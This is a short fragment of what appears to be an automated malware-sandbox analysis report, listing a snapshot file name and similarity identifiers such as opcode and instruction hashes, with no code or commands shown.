                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9c87041d6d869abff669c0cdbc3c90f67117654d1102e2f71810591cd0f1010a
                                                                                                                                                • Instruction ID: 555af71154ecae8540c87ebc37dd2a567bfe8df002d0202f8a1b874628948ca6
                                                                                                                                                • Opcode Fuzzy Hash: 9c87041d6d869abff669c0cdbc3c90f67117654d1102e2f71810591cd0f1010a
                                                                                                                                                • Instruction Fuzzy Hash: 6EC0223040430897C20DF730EC20F08779EEBC0380F80C010A006D5309DE78AC818BB4